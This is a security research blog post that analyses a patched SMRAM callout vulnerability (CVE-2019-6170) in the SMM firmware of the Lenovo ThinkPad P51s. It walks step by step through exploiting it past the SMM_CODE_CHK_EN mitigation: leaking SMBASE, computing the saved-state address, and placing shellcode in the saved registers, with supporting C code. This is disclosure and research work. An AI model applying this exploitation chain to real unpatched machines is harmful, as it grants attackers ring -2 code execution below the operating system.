Through the SMM-class and a vulnerability found there.

Written by Bruno Pujos - 14/01/2020 - in Exploit
In this blog post, a vulnerability in the System Management Mode (SMM) code of some Lenovo ThinkPads is described. The vulnerability is a callout of SMRAM which allows an attacker to elevate privileges from kernel to SMM.

This article explains the step-by-step exploitation of the vulnerability including the mapping of the code in SMM through the usage of the SMM save state area.

Last summer, I finally started reversing the firmware of a computer I had owned for quite some time: a Lenovo ThinkPad P51s.

One of the reasons I was interested in looking at this firmware is that the Independent BIOS Vendor (IBV, a company specialized in developing firmware) seems to be Phoenix Technologies [1] and not AMI, as was the case for most firmware I have had the occasion to look at. While most firmware is based on EDKII, a different IBV means a lot of the code is different.

I started by looking at the SMM drivers and quickly found a vulnerability: a callout of SMRAM in one of the SWSMI handlers. The vulnerability was patched in August by Lenovo and I could not find any advisory for this vulnerability.

UPDATE (2020-01-20): Since the publication of this blog post we have been contacted by @yngweijw, who informed us that this is actually CVE-2019-6170, which he reported to Lenovo, and that an advisory is indeed available. Congratulations to him for finding the vulnerability! Of course, you can disregard everything I say in the following article about silent patching :).

After a quick overview of SMM and UEFI (which you can safely ignore if you are already familiar with those) the vulnerability will be explained, followed by its exploitation which uses a technique previously published in another blog post: Code Check(mate) in SMM.

The following content was also publicly presented, and the slides are available here.

SMM and UEFI

UEFI is a specification which describes a standard set of interfaces for developing firmware, and in particular the BIOS. This firmware is one of the first things executed on the CPU at boot. It is in charge of initializing the hardware and setting it up so that an OS can start. This firmware is stored on an SPI flash present in the computer. The main advantage for an attacker of compromising this firmware is to achieve persistence somewhere other than the hard drive.

System Management Mode (SMM) is an Intel CPU mode. It is often called ring -2 as it is more privileged than the kernel or the hypervisor. SMM possesses its own memory space, called SMRAM, which is protected from access by other modes. SMM can be seen as a "secure world" not dissimilar to TrustZone on ARM. However, its initial goal was not to provide security features but to handle computer-specific requirements such as Advanced Power Management (APM, which was replaced by ACPI). Today it is also used for protecting write access to the SPI flash which contains the UEFI code.

[Figure: "Transitions Among the Processor's Operating Modes", from the Intel manual]

As can be seen in the previous schematic, SMM can be reached from any of the "normal" modes. SMM also supports 16-bit, 32-bit and 64-bit execution, which makes it a kind of duplicate of all the other modes.

The transition between the normal modes and SMM is made when a System Management Interrupt (SMI) is triggered. When this happens, the processor switches to SMM: it first saves the current state of the CPU to a memory zone called the "Saved State" (necessary for restoring it later on) and then changes the context, including the instruction pointer, to execute code in the SMRAM.

[Figure: basic SMRAM map; SMBASE may not be aligned with the start of SMRAM]

SMRAM is a zone of physical RAM reserved by the UEFI firmware to be used by SMM. It is protected from "normal" access by the SMRR [2] but also from DMA access and so on. The SMBASE is an address which must be inside this range and is used for determining where the Saved State is stored and where the instruction pointer is set when switching to SMM. There is one SMBASE per core (so that two cores switching at the same time do not overwrite each other's saved state) and there is no constraint on where those should be inside the SMRAM.

Several kinds of SMI exist but one in particular, the SoftWare SMI (SWSMI), is interesting for an attacker. A SWSMI is triggered by writing a value to I/O port 0xb2. After the switch is made, the code will usually search for a SWSMI handler corresponding to the value written to the I/O port. Those handlers are usually 64-bit code.

Finally, the code running in SMM (set up inside the SMRAM) is initialized by the UEFI firmware. In particular, the SWSMI handlers are usually set up during the Driver eXecution Environment (DXE) phase of a UEFI boot. The DXE phase is composed of a few hundred drivers which are used for everything from hardware initialization to the implementation of a network stack.

Those drivers are provided with a set of services (in particular the EFI_BOOT_SERVICES and EFI_RUNTIME_SERVICES) located in normal mode which provide a set of basic features such as allocation and access to non-volatile variables.

The EFI_BOOT_SERVICES also allow drivers to register and access protocols. Protocols allow the drivers to share functionality and are identified by a GUID. In practice, as all memory accesses are made in physical memory during the UEFI boot, a protocol only associates a GUID with a pointer. Some of those protocols are public and documented (some in the UEFI specifications, some in edk2) but others are specific to each vendor. At the end of the DXE phase, the firmware locks the SMRAM, preventing access to it, and then tries to start a bootloader to make the transition to the OS.

Vulnerability

Initial Reverse Engineering

When I began reversing the firmware, I started by identifying which protocol [3] was used by the drivers for registering the SWSMI handlers. In this case, they used the classical EFI_SMM_SW_DISPATCH2_PROTOCOL, which is defined in edk2 (MdePkg/Include/Protocol/SmmSwDispatch2.h) and is documented. Once I had identified this protocol, I ran a simple byte search over the driver binaries to find all the drivers using it and started reversing.

One of those drivers was named SmmOEMInt15. It is a really small driver with only 21 functions, including one which registers a SWSMI:

// [...]
res = gSmst->SmmLocateProtocol(&UnkProtocolGuid, NULL, &unk_protocol); // (1)
// [...]
swsmi_number = 0xFFFFFFFF;
if ((*unk_protocol)(&swsmi_oemint15_guid, &swsmi_number) < 0) // (2)
    return EFI_UNSUPPORTED;
RegisterContext.SwSmiInputValue = swsmi_number; // (3)
if (EFI_ERROR(EfiSmmSwDispatch2ProtocolInterface->Register( // (4)
          EfiSmmSwDispatch2ProtocolInterface,
          swsmi_handler_unk_func,
          &RegisterContext,
          &DispatchHandle)))
    return EFI_UNSUPPORTED;
return EFI_SUCCESS;

The previous snippet of code does the following:

  1. Retrieve an undocumented protocol (unk_protocol) with the GUID ff052503-1af9-4aeb-83c4-c2d4ceb10ca3 (UnkProtocolGuid) using the EFI_SMM_SYSTEM_TABLE2 (gSmst), which contains some services for SMM.
  2. Call the first function of this protocol with a new unknown GUID eee19e05-079a-4d17-8f46-cf811260db26 (&swsmi_oemint15_guid) and use it to retrieve a number (swsmi_number).
  3. The swsmi_number retrieved in the previous step is then set in the context used later to register the SWSMI handler; this is the value which must be written to I/O port 0xb2.
  4. Finally, the EFI_SMM_SW_DISPATCH2_PROTOCOL is used for registering the function swsmi_handler_unk_func as the SWSMI handler.

The first problem with this code was the use of an unknown protocol for getting the SWSMI number. This protocol was used by several (but not all) of the drivers registering a SWSMI, and it was necessary to reverse it before performing any tests.

SystemSwSmiAllocatorSmm

By searching for the GUID of the undocumented protocol (ff052503-1af9-4aeb-83c4-c2d4ceb10ca3), it was easy to find the driver which implements it: SystemSwSmiAllocatorSmm. This driver is also quite simple, with even fewer functions.
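
Searching binaries for a GUID requires converting its textual form to the bytes actually stored in the image. The following is a minimal sketch in C, assuming the usual EFI_GUID layout (the first three fields stored little-endian, the last eight bytes stored as written). The names guid_t, guid_to_bytes and find_guid are hypothetical helpers, not part of any firmware tool.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Same field layout as EFI_GUID in edk2. */
typedef struct {
    uint32_t data1;
    uint16_t data2;
    uint16_t data3;
    uint8_t  data4[8];
} guid_t;

/* ff052503-1af9-4aeb-83c4-c2d4ceb10ca3, the undocumented protocol GUID. */
static const guid_t swsmi_allocator_guid = {
    0xff052503, 0x1af9, 0x4aeb,
    { 0x83, 0xc4, 0xc2, 0xd4, 0xce, 0xb1, 0x0c, 0xa3 }
};

/* Serialize a GUID to the 16 bytes found in a little-endian firmware image. */
static void guid_to_bytes(const guid_t *g, uint8_t out[16])
{
    out[0] = (uint8_t)(g->data1);
    out[1] = (uint8_t)(g->data1 >> 8);
    out[2] = (uint8_t)(g->data1 >> 16);
    out[3] = (uint8_t)(g->data1 >> 24);
    out[4] = (uint8_t)(g->data2);
    out[5] = (uint8_t)(g->data2 >> 8);
    out[6] = (uint8_t)(g->data3);
    out[7] = (uint8_t)(g->data3 >> 8);
    memcpy(&out[8], g->data4, 8);
}

/* Return the offset of the first occurrence of the GUID in buf, or -1. */
static long find_guid(const uint8_t *buf, size_t len, const guid_t *g)
{
    uint8_t pat[16];

    assert(buf != NULL || len == 0);
    guid_to_bytes(g, pat);
    for (size_t i = 0; i + sizeof(pat) <= len; i++) {
        if (memcmp(buf + i, pat, sizeof(pat)) == 0)
            return (long)i;
    }
    return -1;
}
```

For the GUID above, the pattern to look for is therefore 03 25 05 ff f9 1a eb 4a 83 c4 c2 d4 ce b1 0c a3.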

The first action of this driver is to allocate several buffers in normal world. One of them is particularly interesting, as it is registered as a configuration table with the GUID 7E791691-5752-4392-B888-EFF9C74F5D77. A configuration table is accessible to all drivers and associates a pointer with a GUID. Configuration tables are usually used for passing data from one driver to another, while protocols are used to pass capabilities; in practice, both associate a GUID with a pointer.

Once those initial steps and a little initialization are done, the driver registers the protocol which interests us. I named it SystemSwsmiAllocatorProtocol after the name of the driver. This protocol contains 3 functions: get_swsmi_num_and_add2list, get_swsmi_num_from_guid and add_swsmi_to_list_no_check (those are obviously the names I gave them).

Basically, this driver allows a SWSMI number to be associated with a GUID. It is possible to ask the driver to find the next available SWSMI number (using the first function) or to provide the number directly (using the third). The second function simply returns the SWSMI number associated with a GUID.

Those associations are stored in a linked list in normal world which is referenced by the configuration table registered at the beginning. This allows an application outside of SMM to get the correct SWSMI number for the functionality it wishes to use. This was probably done to avoid SWSMI number collisions between the different components registering SWSMI handlers.

With all that information, it is quite easy to retrieve the SWSMI number dynamically. Using chipsec [4] from a UEFI shell, I was able to match the SWSMI numbers with the GUIDs:

  1. Retrieve the configuration table ct_swsmi_allocator from the GUID 7E791691-5752-4392-B888-EFF9C74F5D77.
  2. At ct_swsmi_allocator + 0x38 is a pointer to the head of the doubly linked list (the head is a guard: there is no actual data behind this element). It is possible to iterate over this list until the head is reached again.
  3. For each element elt of the list there are a few interesting fields:
    • At elt-0x8 is a magic 0x4E415353.
    • The SWSMI number is at elt+0x10, stored as a qword.
    • The GUID is at elt+0x18.
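
The walk described above can be sketched in C as follows. This is only an illustration under assumptions: physical memory is modeled as a byte buffer (physmem_t and phys_read are hypothetical helpers standing in for whatever physical memory read primitive is available), the forward link is assumed to be the first qword of each element, and the host is assumed to be little-endian.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SWSMI_ELT_MAGIC 0x4E415353u  /* found at elt - 0x8 */

/* Toy view of physical memory: data holds the bytes starting at base. */
typedef struct {
    uint64_t       base;
    const uint8_t *data;
    size_t         size;
} physmem_t;

typedef struct {
    uint64_t swsmi_number;
    uint8_t  guid[16];
} swsmi_entry_t;

/* Copy len bytes from physical address addr; 0 on success, -1 if out of range. */
static int phys_read(const physmem_t *m, uint64_t addr, void *out, size_t len)
{
    if (addr < m->base || addr - m->base > m->size ||
        len > m->size - (addr - m->base))
        return -1;
    memcpy(out, m->data + (addr - m->base), len);
    return 0;
}

/*
 * Walk the list referenced by the configuration table located at ct.
 * Assumption: the forward link is the first qword of each element.
 * Returns the number of entries stored in out, or -1 on a read error
 * or an unexpected magic.
 */
static int walk_swsmi_list(const physmem_t *m, uint64_t ct,
                           swsmi_entry_t *out, int max)
{
    uint64_t head, elt;
    int n = 0;

    assert(out != NULL && max >= 0);
    if (phys_read(m, ct + 0x38, &head, sizeof(head)) != 0 ||
        phys_read(m, head, &elt, sizeof(elt)) != 0)
        return -1;

    while (elt != head && n < max) {
        uint32_t magic;

        if (elt < 0x8 ||
            phys_read(m, elt - 0x8, &magic, sizeof(magic)) != 0 ||
            magic != SWSMI_ELT_MAGIC ||
            phys_read(m, elt + 0x10, &out[n].swsmi_number, 8) != 0 ||
            phys_read(m, elt + 0x18, out[n].guid, 16) != 0)
            return -1;
        n++;
        if (phys_read(m, elt, &elt, sizeof(elt)) != 0) /* follow forward link */
            return -1;
    }
    return n;
}
```

Checking the magic on every element is a cheap way to notice early that the offsets do not match the firmware version being analyzed.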

Once we have retrieved the correlation between the GUID and SWSMI number, it becomes possible to trigger the code of the SWSMI handler. It is now time to look at it.

The vulnerability

The first action of the SWSMI handler from SmmOEMInt15 is to retrieve the value of the RSI register from the saved state. This is done by using EFI_MM_CPU_PROTOCOL (previously named EFI_SMM_CPU_PROTOCOL) which is also documented and part of edk2 (MdePkg/Include/Protocol/MmCpu.h). This protocol will search the value saved by the CPU in the saved state for the register and return it. This is a really interesting start for a SWSMI handler as this value is an actual user input.

Even more interestingly, this value is then used as a pointer to a structure, and the first two bytes of this structure are used as an enum for a switch calling different handlers. I quickly started to reverse the handlers but never actually finished, as I found a quite interesting piece of code when looking at the handler 0x3E00.

The first thing that this handler does is to calculate a value from two fields in the structure, setting it in a global variable (controlled) before calling an internal function:

base_ptr = 0x10 * rsi_val->local_used; // local_used off. 0x1C (2 bytes)
controlled = (base_ptr + rsi_val->for_global); // for_global off. 0x10 (2 bytes)
v14 = handler_internal_3E00(base_ptr);
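
The computation has the same shape as a real-mode segment:offset address. As a minimal sketch, the structure below is reconstructed only from the two offsets given in the comments and from the two-byte command at the start; the unknown0 and unknown1 padding fields, the type name and the helper name are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef struct {
    uint16_t command;        /* first two bytes: selects the handler (0x3E00 here) */
    uint8_t  unknown0[0x0E]; /* not described in the article */
    uint16_t for_global;     /* offset 0x10 */
    uint8_t  unknown1[0x0A]; /* not described in the article */
    uint16_t local_used;     /* offset 0x1C */
} oemint15_args_t;

_Static_assert(offsetof(oemint15_args_t, for_global) == 0x10, "for_global offset");
_Static_assert(offsetof(oemint15_args_t, local_used) == 0x1C, "local_used offset");

/* Address stored in the global variable named controlled. */
static uint32_t compute_controlled(const oemint15_args_t *a)
{
    assert(a != NULL);
    uint32_t base_ptr = 0x10u * a->local_used;
    return base_ptr + a->for_global;
}
```

Since both fields are 16 bits wide and fully attacker-controlled, controlled can take any value up to 0xFFFF0 + 0xFFFF = 0x10FFEF, all of which lies in normal world memory.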

The handler_internal_3E00 function in itself begins with two really interesting basic blocks:

[Figure: start of the handler_internal_3E00 function]

The first thing it does is check whether the value at *(controlled+2) is 0. If so, after some weird stuff (yes, that is indeed a write of 0xFFFEFFFE at the address 0x4...; as we are in physical memory without any protection, this does not crash), it calls the EFI_BOOT_SERVICES.LocateHandleBuffer function.

The problem with calling this function from SMM is that EFI_BOOT_SERVICES is a table of services located in the normal world. An attacker can simply change the address in the EFI_BOOT_SERVICES table and get an arbitrary call. This type of vulnerability is usually named a callout of SMRAM, and it is basically equivalent to calling userland code from kernel land.

Exploitation

In the past (around 2017~2018), a callout of SMRAM was really simple to exploit: it was enough to change the code (or the function pointer in this case) before triggering the SWSMI. However, the SMM_CODE_CHK_EN mitigation has started to be commonly used since then and it is indeed activated on my Lenovo P51s.

SMM_CODE_CHK_EN is a SMEP-like feature for SMM: if code from outside of the SMRAM (as defined by the SMRR) is executed while in SMM, the computer will basically just crash. In practice, SMM_CODE_CHK_EN is a bit in an MSR initialized by the firmware during boot. It can be locked and, once it is, it cannot be disabled. As it is a SMEP-like feature, the usual kernel bypasses will work, but there are a few disadvantages to using them:

  • firmware is not as standardized as a kernel: a trick will probably not be portable,
  • SMM is a big black box from the normal world's point of view and data communication is supposedly limited,
  • there is no ASLR, but addresses depend on the computer and firmware version.

For all of those reasons an exploit may not work as expected on another vulnerable firmware.
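
The SMEP-like check described above can be modeled in a few lines of C. This is a toy model, not how the CPU implements it, and the bit positions are assumptions taken from my reading of the Intel manuals (lock in bit 0 and SMM_Code_Chk_En in bit 2 of MSR_SMM_FEATURE_CONTROL, valid bit in bit 11 of IA32_SMRR_PHYSMASK); they should be verified against the SDM for the targeted CPU. The function names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Assumed bit positions in MSR_SMM_FEATURE_CONTROL (check the SDM). */
#define SMM_FEATURE_CONTROL_LOCK      (1ull << 0)
#define SMM_FEATURE_CONTROL_CODE_CHK  (1ull << 2)

/* Assumed layout of IA32_SMRR_PHYSMASK: bit 11 valid, bits 31:12 mask. */
#define SMRR_MASK_VALID  (1ull << 11)
#define SMRR_ADDR_BITS   0xFFFFF000ull

/* True when the mitigation is both enabled and locked. */
static bool code_chk_enabled_and_locked(uint64_t feature_control)
{
    const uint64_t both = SMM_FEATURE_CONTROL_LOCK | SMM_FEATURE_CONTROL_CODE_CHK;
    return (feature_control & both) == both;
}

/* True when addr falls inside the range described by the two SMRR values. */
static bool addr_in_smrr(uint64_t addr, uint64_t physbase, uint64_t physmask)
{
    if (!(physmask & SMRR_MASK_VALID))
        return false;
    uint64_t mask = physmask & SMRR_ADDR_BITS;
    return addr <= 0xFFFFFFFFull && (addr & mask) == (physbase & mask);
}

/* Toy model: is a call to target tolerated while running in SMM? */
static bool smm_call_allowed(uint64_t target, uint64_t feature_control,
                             uint64_t physbase, uint64_t physmask)
{
    if (!(feature_control & SMM_FEATURE_CONTROL_CODE_CHK))
        return true; /* mitigation off: any callout is executed */
    return addr_in_smrr(target, physbase, physmask);
}
```

With the mitigation enabled, a callout only survives when its target lies inside the SMRR range, which is exactly the constraint the rest of the exploitation has to satisfy.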

At this point if we try to trigger the code of the 0x3E00 handler with the callout of SMRAM the following will happen:

[Figure: triggering the callout]

  1. We trigger the SWSMI with the correct number, the correct values in RSI and in memory for reaching the callout.
  2. The CPU will save the current state somewhere in SMRAM.
  3. Some code will be executed (including the switch to 64-bit mode) and our SWSMI handler will be called.
  4. The 0x3E00 handler will fetch the EFI_BOOT_SERVICES.LocateHandleBuffer function pointer from memory.
  5. And call the function.
  6. And then... it will just crash. Because SMM_CODE_CHK_EN is activated the call to code in normal world will never be executed, and so the original code without any modification does not even work.

Now that we know that, the goal is to execute our code in SMM in a stable way that is, hopefully, easily portable between different firmware with the same vulnerability. To do this, I used a technique which I have previously explained in detail in another blog post: Code Check(mate) in SMM.

The basic idea is to take advantage of the saved state which is set up by the CPU when switching to SMM. The saved state is always located at SMBASE + 0xFC00 and contains numerous general purpose registers, allowing us to control (in the best case) 0x80 bytes of memory:

typedef struct _ssa_normal_reg {
    UINT64 r15; // start at SMBASE + 0xFF1C
    UINT64 r14; // 0xFF24
    UINT64 r13; // 0xFF2C
    UINT64 r12; // 0xFF34
    UINT64 r11; // 0xFF3C
    UINT64 r10; // 0xFF44
    UINT64 r9; // 0xFF4C
    UINT64 r8; // 0xFF54
    UINT64 rax; // 0xFF5C
    UINT64 rcx; // 0xFF64
    UINT64 rdx; // 0xFF6C
    UINT64 rbx; // 0xFF74
    UINT64 rsp; // 0xFF7C
    UINT64 rbp; // 0xFF84
    UINT64 rsi; // 0xFF8C
    UINT64 rdi; // 0xFF94
} ssa_normal_reg_t;

As everything uses physical addresses and no memory protection is enabled, the content of the saved state is executable, and 0x80 bytes is more than enough to hold a shellcode which will allow us to gain full control.
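
Because the sixteen registers are saved contiguously, preparing the shellcode amounts to slicing it into 8-byte chunks in the order of the structure above. The following is a minimal sketch assuming a little-endian host; the helper names and the choice of padding with 0x90 (nop) are mine, and the structure is repeated only to keep the example self-contained.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SSA_REGS_OFFSET 0xFF1Cu /* offset of r15 from SMBASE */

/* Same field order as the saved state layout shown above. */
typedef struct {
    uint64_t r15, r14, r13, r12, r11, r10, r9, r8;
    uint64_t rax, rcx, rdx, rbx, rsp, rbp, rsi, rdi;
} ssa_normal_reg_t;

/* Address at which the first shellcode byte ends up for a given SMBASE. */
static uint64_t ssa_regs_address(uint64_t smbase)
{
    return smbase + SSA_REGS_OFFSET;
}

/*
 * Spread up to 0x80 bytes of shellcode over the registers, in the order the
 * CPU stores them. Unused bytes are padded with 0x90 (nop).
 * Returns 0 on success, -1 if the shellcode does not fit.
 */
static int pack_shellcode(const uint8_t *code, size_t len, ssa_normal_reg_t *regs)
{
    assert(code != NULL && regs != NULL);
    if (len > sizeof(*regs))
        return -1;
    memset(regs, 0x90, sizeof(*regs));
    memcpy(regs, code, len);
    return 0;
}
```

This sketch ignores the registers that are constrained by the handler itself: RSI, for instance, must hold the pointer to the structure read by the SWSMI handler, so a real shellcode has to jump over such registers.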

At that point the idea is the following:

[Figure: idea of the CodeChk bypass]

  1. First we rewrite the address of LocateHandleBuffer in the EFI_BOOT_SERVICES structure with the address where our registers, which contain the shellcode, will be located in the saved state.
  2. Then we trigger the SWSMI with our shellcode stored in the registers. We still have to comply with all the conditions necessary to reach our handler, but this leaves us more than enough space for our shellcode.
  3. The CPU will then save our state in SMRAM, mapping our shellcode for us.
  4. Our SWSMI handler will be called, which itself calls the 0x3E00 handler.
  5. The function pointer for EFI_BOOT_SERVICES.LocateHandleBuffer will be fetched, but the address inside the saved state will be retrieved instead.
  6. Our shellcode will be called and as the saved state is located inside the SMRAM, SMM_CODE_CHK_EN will not be triggered.

This idea is pretty simple and allows us to map our shellcode inside the SMRAM without depending on the firmware's code. Sadly, there is a little problem with it: we do not know the SMBASE which is used for computing the base address of the saved state.

Getting the value of SMBASE has been a classical problem when exploiting SMM vulnerabilities for quite some time. Usually there are three main techniques for retrieving it: you can guess it, you can bruteforce it or you can read the MSR IA32_SMBASE which contains its value. The first two techniques have a huge probability of making the computer crash and, sadly, the IA32_SMBASE register can only be read from SMM, creating a chicken-and-egg problem. Because of this, I started to look for a better technique which would allow the SMBASE to be retrieved reliably and without control of the hardware.

The SMBASE is initialized in the PiSmmCpuDxeSMM driver, which is open-source and available in edk2. When initializing the SMBASE, the first thing it does is calculate the size it needs to reserve. Because there needs to be one SMBASE per CPU, reserving 0x10000 bytes is not enough, but to save RAM the driver avoids reserving that much memory for each CPU. Instead, a TileSize is calculated in the driver to determine by how much each SMBASE is shifted from the previous one. While the calculation is made dynamically in the driver, in practice the shift is always 0x2000 bytes. We now know the position of the SMBASEs relative to each other and that 0x10000 + TileSize * (number_of_cpu - 1) bytes of memory will be reserved.
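
The arithmetic of the previous paragraph can be written down as a short C sketch. It assumes the TileSize of 0x2000 observed in practice and that consecutive SMBASEs are separated by exactly one tile; the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define SMBASE_SPAN 0x10000u /* space covered by a single SMBASE */
#define TILE_SIZE   0x2000u  /* shift between SMBASEs observed in practice */

/* Total number of bytes reserved for the SMBASEs of num_cpu CPUs. */
static uint64_t smbase_region_size(unsigned num_cpu)
{
    assert(num_cpu >= 1);
    return SMBASE_SPAN + (uint64_t)TILE_SIZE * (num_cpu - 1);
}

/* SMBASE of the CPU at position cpu_index, given the first SMBASE. */
static uint64_t smbase_of_cpu(uint64_t first_smbase, unsigned cpu_index)
{
    return first_smbase + (uint64_t)TILE_SIZE * cpu_index;
}
```

For example, with 8 CPUs the reservation is 0x10000 + 7 * 0x2000 = 0x1E000 bytes, instead of the 0x80000 bytes that eight independent 0x10000 ranges would need.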

To reserve the memory, the driver uses a wrapper around the SmmAllocatePages function and does not specify a particular address at which to map this memory. By default, SmmAllocatePages first looks in a freelist and, if nothing suitable is found, takes the highest available address. At that point of the boot there has been no reason to free a chunk of memory that big, meaning we can safely ignore the freelist. The last interesting point about SmmAllocatePages is that it is also used for mapping SMM drivers, and when the allocation for the SMBASE is done we know that the last driver allocated is the PiSmmCpuDxeSMM driver. At that point we know that the memory looks like this:

[Figure: memory layout around the SMBASEs]

We still do not have SMBASE but we start to have a good idea of what is around it, and it happens that PiSmmCpuDxeSMM registers a normal world protocol:

Status = SystemTable->BootServices->InstallMultipleProtocolInterfaces (
    &gSmmCpuPrivate->SmmCpuHandle,
    &gEfiSmmConfigurationProtocolGuid, &gSmmCpuPrivate->SmmConfiguration,
    NULL
    );

The gSmmCpuPrivate->SmmConfiguration is located inside the PiSmmCpuDxeSMM driver and, because it is registered with the EFI_BOOT_SERVICES, this pointer and its associated GUID (gEfiSmmConfigurationProtocolGuid) are stored in normal world. Using EFI_BOOT_SERVICES.LocateProtocol we can retrieve this pointer. As weird as it seems, this is actually done "on purpose": this protocol is used by normal world drivers during the boot phase and, at the moment they use it, the SMRAM is not yet locked. However, such a leak could be avoided by uninstalling this protocol when the SMRAM is locked. As this driver is part of edk2, most firmware integrates it and this technique is basically portable between vendors. If you wish for a more detailed description of the leak, one is available in my previous blog post.

Using this leak, we can calculate the base address of PiSmmCpuDxeSMM (base = leak - off), use it to deduce the SMBASE address (base - 0x10000 - tilesize * (numcpu - 1)) and from that get the saved state address. A problem I encountered while using this technique was that the number of CPUs used in the calculation (numcpu) did not match what I expected, and it took me some time to figure out this bug. It is in fact possible to get the actual number used for the calculation through the EfiPiMpServicesProtocol, which is accessible from normal world.
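
Put together, the computation from the leak to the address of the shellcode looks like the sketch below. The structure, the function names and the numbers in the usage note are illustrative only: the offset of the leaked pointer inside the driver depends on the firmware version, and the sketch assumes that the SMBASEs are laid out in increasing CPU order and that the SWSMI is triggered from the CPU at position cpu_index.

```c
#include <assert.h>
#include <stdint.h>

#define SSA_REGS_OFFSET 0xFF1Cu /* offset of the saved r15 from SMBASE */

typedef struct {
    uint64_t leak;        /* pointer obtained through the SmmConfiguration protocol */
    uint64_t leak_offset; /* offset of that pointer in the driver image (firmware specific) */
    unsigned num_cpu;     /* CPU count actually used by the driver */
    uint64_t tile_size;   /* 0x2000 in practice */
} smbase_leak_t;

/* base - 0x10000 - tilesize * (numcpu - 1), with base = leak - off. */
static uint64_t first_smbase(const smbase_leak_t *l)
{
    assert(l->num_cpu >= 1);
    uint64_t driver_base = l->leak - l->leak_offset;
    return driver_base - 0x10000 - l->tile_size * (l->num_cpu - 1);
}

/* Address where the saved registers (our shellcode) land for one CPU. */
static uint64_t shellcode_address_from_leak(const smbase_leak_t *l, unsigned cpu_index)
{
    assert(cpu_index < l->num_cpu);
    return first_smbase(l) + l->tile_size * cpu_index + SSA_REGS_OFFSET;
}
```

With made-up values leak = 0x7B0F5A20, off = 0x15A20, 4 CPUs and a tile size of 0x2000, the driver base is 0x7B0E0000, the first SMBASE is 0x7B0CA000 and the shellcode of the first CPU lands at 0x7B0D9F1C.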

At this point we have everything needed for the exploit:

[Figure: full steps of exploitation]

First we need to get the address of the saved state:

  1. Use the EFI_BOOT_SERVICES.LocateProtocol function for retrieving the EfiSmmConfigurationProtocol.
  2. From the protocol we get the leak in the PiSmmCpuDxeSMM driver.
  3. This allows us to calculate the SMBASE and deduce the address of the saved state where our shellcode will be.

Then we need to trigger the exploit:

  1. We start by rewriting the address of the EFI_BOOT_SERVICES.LocateHandleBuffer function with the value we just calculated.
  2. We trigger our SWSMI with our shellcode stored in the registers.
  3. The CPU will map our shellcode at the address we have calculated before.
  4. The SWSMI for SmmOEMInt15 is called and in particular the 0x3E00 handler.
  5. While trying to get the LocateHandleBuffer address, it will retrieve the address where our shellcode has been mapped.
  6. And finally our shellcode will be called giving us code execution in SMM.

Conclusion

This bug was silently patched for the Lenovo P51s in August 2019. The patch is really quite simple: the handler for the command 0x3E00 has been deleted. However, as we have seen previously, the original code of this handler would have made the computer crash, and it is possible that it was removed because it did not work anymore or because the feature was no longer used. This is a perfect example of the value of the SMM_CODE_CHK_EN hardening: even if it is still pretty easy to bypass (we still need a leak), it forces BIOS developers to remove the callouts of SMRAM and, because of it, this kind of vulnerability is dying.

Finally, it is also worth noting that this vulnerability is not sufficient to gain persistence on the SPI flash. The Lenovo P51s firmware makes use of Intel Boot Guard (IBG), another recent mechanism which performs code signing and integrity checks of the firmware code at boot time. Today, an SMM vulnerability is only the first step, and another one allowing IBG to be bypassed would be needed to become persistent.

  • 1. Phoenix Technologies is an IBV; their firmware is based on EDKII and called Phoenix SecureCore Technology (SCT). A simple search of the strings for Phoenix or SecureCore is usually enough to identify their firmware. In my experience the most common IBVs are AMI, Phoenix and Insyde.
  • 2. The System Management Range Registers (SMRR) are two MSRs (Model Specific Registers) which define the range of physical memory protected from normal access. Those MSRs are usually the simplest way to determine the SMRAM range; they should be set by the firmware once the initialization of SMM has ended.
  • 3. Several protocols have existed over time and some vendors (OEM or IBV) define their own. This is actually done by this Lenovo firmware in the LenovoSecuritySmiDispatch driver, which registers an undocumented protocol with GUID 9f5e8c5e-0373-4a08-8db5-1f913316c5e4 to give other drivers a way to register handlers through a unique SWSMI, but this is not relevant for this blog post.
  • 4. Chipsec is an open-source tool which can dump the UEFI firmware and provides a lot of utilities for analyzing and testing the security of the UEFI firmware. I usually launch it from a UEFI Shell as this avoids problems related to the interaction with the OS. Another really good tool to have is UEFITool, which can parse, extract and replace the content of a firmware. Those two tools and a good disassembler are usually enough to start auditing a UEFI firmware.